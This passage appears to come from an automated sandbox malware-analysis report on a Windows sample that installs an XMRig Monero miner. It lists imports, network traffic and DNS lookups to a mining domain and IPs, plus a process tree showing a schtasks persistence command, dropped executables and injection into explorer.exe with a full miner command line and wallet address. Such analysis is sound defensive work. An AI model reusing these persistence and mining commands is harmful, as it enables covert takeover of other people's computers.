                                                        mov eax, dword ptr [00221C17h]
                                                        dec ecx
                                                        mov ecx, eax
                                                        dec ecx
                                                        mov eax, edx
                                                        dec ecx
                                                        mov ebx, ecx
                                                        dec eax
                                                        mov eax, dword ptr [ebp-10h]
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        dec esp
                                                        mov edx, ebx
                                                        call 00007FED04FB33E9h
                                                        dec eax
                                                        mov eax, dword ptr [002205E1h]
                                                        dec eax
                                                        mov ecx, dword ptr [002205E2h]
                                                        dec eax
                                                        mov edx, dword ptr [002205E3h]

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2229300x3c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2240000x90.pdata
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x22296c0x90.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x14e00x1600False0.327414772727data5.39828227973IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata0x30000x21fb6e0x21fc00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .bss0x2230000xfac0x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .pdata0x2240000x900x200False0.17578125data1.20871562712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Imports

                                                        DLLImport
                                                        msvcrt.dllmalloc, memset, _get_pgmptr, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                        kernel32.dllSleep, CreateProcessA, SetUnhandledExceptionFilter

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 1, 2021 18:20:34.654522896 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:20:34.802129984 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:20:34.802308083 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:20:34.802676916 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:20:34.949754000 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:20:34.952109098 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:20:35.006928921 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:20:58.889048100 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:20:59.037017107 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:20:59.165097952 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:03.528681040 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:03.676541090 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:03.852927923 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:09.292006969 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:09.353405952 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:21.406594992 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:21.554615974 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:21.667011976 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:22.168793917 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:22.354504108 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:31.754548073 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:31.902127981 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:31.964907885 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:53.601584911 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:21:53.749329090 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:21:53.857152939 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:08.663139105 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:08.811105013 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:08.858422995 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:14.833985090 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:14.982608080 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:15.171436071 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:37.397836924 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:37.470323086 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:39.301384926 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:39.360992908 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:40.564130068 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:40.712826967 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:40.861068964 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:43.200921059 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:43.348690987 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:43.470679045 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:52.311743021 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:52.459568024 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:52.674566984 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:55.326248884 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:22:55.474033117 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:22:55.674835920 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:00.538438082 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:00.686855078 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:00.862798929 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:06.417404890 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:06.566159010 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:06.675754070 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:14.762794018 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:14.910789013 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:14.973330975 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:16.868604898 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:17.016742945 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:17.176672935 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:22.813848972 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:22.961983919 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:23.177175999 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:24.301785946 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:24.380407095 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:27.197225094 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:27.345983982 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:27.568159103 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:23:43.398880005 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:23:43.484649897 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:24:02.688910007 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:24:02.836719036 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:24:02.977413893 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:24:05.420484066 CET497638080192.168.2.4198.23.214.117
                                                        Nov 1, 2021 18:24:05.568367004 CET808049763198.23.214.117192.168.2.4
                                                        Nov 1, 2021 18:24:05.680722952 CET497638080192.168.2.4198.23.214.117

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 1, 2021 18:20:34.627938986 CET4925753192.168.2.48.8.8.8
                                                        Nov 1, 2021 18:20:34.650455952 CET53492578.8.8.8192.168.2.4
                                                        Nov 1, 2021 18:22:29.095741987 CET5585453192.168.2.48.8.8.8
                                                        Nov 1, 2021 18:22:29.119029999 CET53558548.8.8.8192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Nov 1, 2021 18:20:34.627938986 CET192.168.2.48.8.8.80xd8f8Standard query (0)xmr.givemexyz.inA (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:22:29.095741987 CET192.168.2.48.8.8.80xe55cStandard query (0)xmr.givemexyz.inA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Nov 1, 2021 18:20:34.650455952 CET8.8.8.8192.168.2.40xd8f8No error (0)xmr.givemexyz.in212.114.52.24A (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:20:34.650455952 CET8.8.8.8192.168.2.40xd8f8No error (0)xmr.givemexyz.in198.23.214.117A (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:20:34.650455952 CET8.8.8.8192.168.2.40xd8f8No error (0)xmr.givemexyz.in194.5.249.24A (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:22:29.119029999 CET8.8.8.8192.168.2.40xe55cNo error (0)xmr.givemexyz.in198.23.214.117A (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:22:29.119029999 CET8.8.8.8192.168.2.40xe55cNo error (0)xmr.givemexyz.in212.114.52.24A (IP address)IN (0x0001)
                                                        Nov 1, 2021 18:22:29.119029999 CET8.8.8.8192.168.2.40xe55cNo error (0)xmr.givemexyz.in194.5.249.24A (IP address)IN (0x0001)

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: pcNCraWcRk.exe PID: 1380 Parent PID: 2848

                                                        General

                                                        Start time:18:20:03
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\Desktop\pcNCraWcRk.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Users\user\Desktop\pcNCraWcRk.exe'
                                                        Imagebase:0x400000
                                                        File size:2234368 bytes
                                                        MD5 hash:0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Analysis Process: conhost.exe PID: 612 Parent PID: 1380

                                                        General

                                                        Start time:18:20:03
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Analysis Process: cmd.exe PID: 4564 Parent PID: 612

                                                        General

                                                        Start time:18:20:06
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff622070000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 6176 Parent PID: 4564

                                                        General

                                                        Start time:18:20:07
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: schtasks.exe PID: 6456 Parent PID: 4564

                                                        General

                                                        Start time:18:20:08
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff6de4a0000
                                                        File size:226816 bytes
                                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: services64.exe PID: 3496 Parent PID: 968

                                                        General

                                                        Start time:18:20:09
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Imagebase:0x400000
                                                        File size:2234368 bytes
                                                        MD5 hash:0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 65%, Virustotal, Browse
                                                        • Detection: 31%, Metadefender, Browse
                                                        • Detection: 81%, ReversingLabs
                                                        Reputation:low

                                                        Analysis Process: conhost.exe PID: 5252 Parent PID: 3496

                                                        General

                                                        Start time:18:20:10
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.849031612.000002C960EA6000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.847850368.000002C9604A6000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Analysis Process: cmd.exe PID: 5140 Parent PID: 612

                                                        General

                                                        Start time:18:20:11
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff622070000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 6680 Parent PID: 5140

                                                        General

                                                        Start time:18:20:11
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: services64.exe PID: 6756 Parent PID: 5140

                                                        General

                                                        Start time:18:20:12
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Imagebase:0x400000
                                                        File size:2234368 bytes
                                                        MD5 hash:0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Analysis Process: sihost64.exe PID: 5264 Parent PID: 5252

                                                        General

                                                        Start time:18:20:13
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
                                                        Imagebase:0x400000
                                                        File size:31232 bytes
                                                        MD5 hash:2497F634A80476AE2EAE956D8B84528E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 49%, Metadefender, Browse
                                                        • Detection: 82%, ReversingLabs
                                                        Reputation:low

                                                        Analysis Process: conhost.exe PID: 5952 Parent PID: 6756

                                                        General

                                                        Start time:18:20:13
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.732288392.000002A7830D1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 5932 Parent PID: 5264

                                                        General

                                                        Start time:18:20:13
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' '/sihost64'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        Analysis Process: explorer.exe PID: 6784 Parent PID: 5952

                                                        General

                                                        Start time:18:20:18
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
                                                        Imagebase:0x7ff6fee60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.726457226.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.719362766.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
